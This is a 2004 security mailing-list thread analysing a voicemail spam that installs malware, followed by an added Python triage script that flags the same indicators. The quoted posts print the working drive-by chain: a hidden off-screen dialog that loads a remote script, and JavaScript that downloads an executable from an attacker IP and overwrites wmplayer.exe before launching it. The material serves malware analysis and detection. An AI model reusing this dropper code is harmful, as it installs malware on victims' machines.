Open Source and information security mailing list archives
 
Message-ID: <40D0908F.1000609@joesmith.homeip.net>
From: joe at joesmith.homeip.net (joe smith)
Subject: spamming trojan?

I used PE Explorer. 

Looks like june4.exe is some kind of spyware.  It references another 
site, "cjdra.com", possibly uploading user information there. 

I just started learning assembly, please pardon my lack of knowledge on 
reverse engineering.

J

Michael Gargiullo wrote:

>On Wed, 2004-06-16 at 13:41, joe smith wrote:
>>The file is UPX packed and within the file there is another "GET" 
>>pointing to "http://219.234.95.124/june4.exe"
>>
>>J
>
>Like those Chinese stacking dolls...  How'd you unpack it? 
>
>>Michael Gargiullo wrote:
>>
>>>On Wed, 2004-06-16 at 08:23, Geo. wrote:
>>>>Received a spam this morning claiming I have a voicemail with the link
>>>>(warning do not click the link)
>>>>
>>>>http:-//www-1voicemailbox-net/voicemail/ (dashes added by me)
>>>>
>>>>which brings up a frames-based page with one of the frames containing this
>>>>
>>>>   function InjectedDuringRedirection(){
>>>>       // Opens a modal dialog parked off-screen (negative top/left, 1x1 pixel)
>>>>       // and sets its location to a javascript: URL that pulls in a remote script.
>>>>       showModalDialog('md.htm', window,
>>>>           "dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;")
>>>>           .location = "javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
>>>>   }
>>>>
>>>>Anyone want to try and analyze what this thing is? It was spammed to about
>>>>30 addresses here this morning.
>>>>
>>>>Geo.
>>>
>>>Here's the contents:
>>>
>>>var x = new ActiveXObject("Microsoft.XMLHTTP"); 
>>>x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe", 0);   // third arg 0: synchronous fetch of the payload
>>>x.Send(); 
>>>
>>>var s = new ActiveXObject("ADODB.Stream");
>>>s.Mode = 3;   // adModeReadWrite
>>>s.Type = 1;   // adTypeBinary
>>>s.Open();
>>>s.Write(x.responseBody);
>>>
>>>// 2 = adSaveCreateOverWrite: the downloaded file replaces the real Windows Media Player binary
>>>s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
>>>// mms:// is handled by Windows Media Player, so this launches the overwritten wmplayer.exe
>>>location.href = "mms://";
>>>
>>>so whatever w_e_d.exe is...
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.netsys.com/full-disclosure-charter.html
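
As an added example (not code from the thread or from any of its posters): a small Python triage script that checks a page or script for the pieces of the chain quoted above (off-screen showModalDialog, XMLHTTP fetch, ADODB.Stream write to disk, protocol-handler launch) and checks a binary for UPX section markers and embedded download URLs, the two things joe did by hand with PE Explorer. All inputs are constructed here from the strings the thread quotes; the "packed" sample is only a byte string carrying the MZ header, UPX markers and URL, not a real executable.

```python
"""Static triage for the drive-by chain quoted in this thread: a hidden
showModalDialog loader, an XMLHTTP + ADODB.Stream dropper that overwrites
wmplayer.exe, and a UPX-packed second stage carrying a further download URL.

Added example, not code from the thread. Every sample input below is
constructed from the strings the thread quotes.
"""
import re

# Script-side indicators; each regex targets a construct quoted in the thread.
DROPPER_PATTERNS = {
    "xmlhttp_fetch":   re.compile(r'ActiveXObject\(\s*["\']Microsoft\.XMLHTTP["\']', re.I),
    "adodb_stream":    re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', re.I),
    "save_to_file":    re.compile(r'\.SaveToFile\(', re.I),
    # off-screen dialog: negative top/left coordinates
    "hidden_modal":    re.compile(r'showModalDialog\([^)]*dialog(?:Top|Left):-\d+', re.I),
    "protocol_launch": re.compile(r'location\.href\s*=\s*["\'][a-z]+://', re.I),
}
SAVE_PATH_RE = re.compile(r'\.SaveToFile\(\s*["\']([^"\']+)["\']', re.I)
SCHEME_RE = re.compile(r'location\.href\s*=\s*["\']([a-z]+)://', re.I)
# Stop at quotes, angle brackets and backslashes so the JS-escaped quoting
# around a URL (SRC=\\'http://...\\') does not leak into the match.
URL_RE = re.compile(r'https?://[^\s"\'<>\\]+', re.I)
URL_RE_BYTES = re.compile(rb'https?://[\x21-\x7e]+')
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")   # section names and packer signature


def scan_script(text):
    """Indicators in a page/script, plus what it fetches, writes and launches."""
    hits = [name for name, rx in DROPPER_PATTERNS.items() if rx.search(text)]
    # JS source doubles backslashes in the path; collapse them to the real path.
    paths = [p.replace("\\\\", "\\") for p in SAVE_PATH_RE.findall(text)]
    return {
        "hits": hits,
        "fetched_urls": URL_RE.findall(text),
        "dropped_paths": paths,
        "launch_schemes": [s.lower() for s in SCHEME_RE.findall(text)],
        # fetch + binary write to disk is the dropper shape, launcher or not
        "is_dropper": {"xmlhttp_fetch", "adodb_stream", "save_to_file"} <= set(hits),
    }


def triage_binary(data):
    """Packer markers and any download URL visible in the raw bytes."""
    packed = any(m in data for m in UPX_MARKERS)
    urls = [u.decode("ascii", "replace") for u in URL_RE_BYTES.findall(data)]
    return {
        "is_pe": data[:2] == b"MZ",
        "upx_packed": packed,
        "urls": urls,
        # UPX compresses the code/data sections, so a packed sample with no
        # visible URL means "unpack first" (upx -d), not "no downloader".
        "needs_unpack": packed and not urls,
    }


# Constructed inputs, assembled from what the thread quotes.
SAMPLE_LOADER = r'''
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://219.234.95.124/vbox/w_e_d.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
'''
SAMPLE_FRAME = r'''
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://219.234.95.124/vbox/shellscript_loader.js\\'><\/script>'";
}
'''
# Fake PE-like blob (constructed): MZ header, UPX section names and packer
# signature, then the download string joe reported finding in june4.exe.
SAMPLE_PACKED = (b"MZ" + b"\x00" * 62
                 + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00UPX!" + b"\x00" * 16
                 + b"GET http://219.234.95.124/june4.exe\x00")

if __name__ == "__main__":
    for label, sample in (("loader", SAMPLE_LOADER), ("frame", SAMPLE_FRAME)):
        print(label, scan_script(sample))
    print("binary", triage_binary(SAMPLE_PACKED))
```

Run it as a script to see the three verdicts. On a real sample the binary half is only a first pass: if `upx_packed` is set and no URL shows up, run `upx -d` (or dump the process after the stub has unpacked itself) and scan the result, since the strings live inside the compressed section until then.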

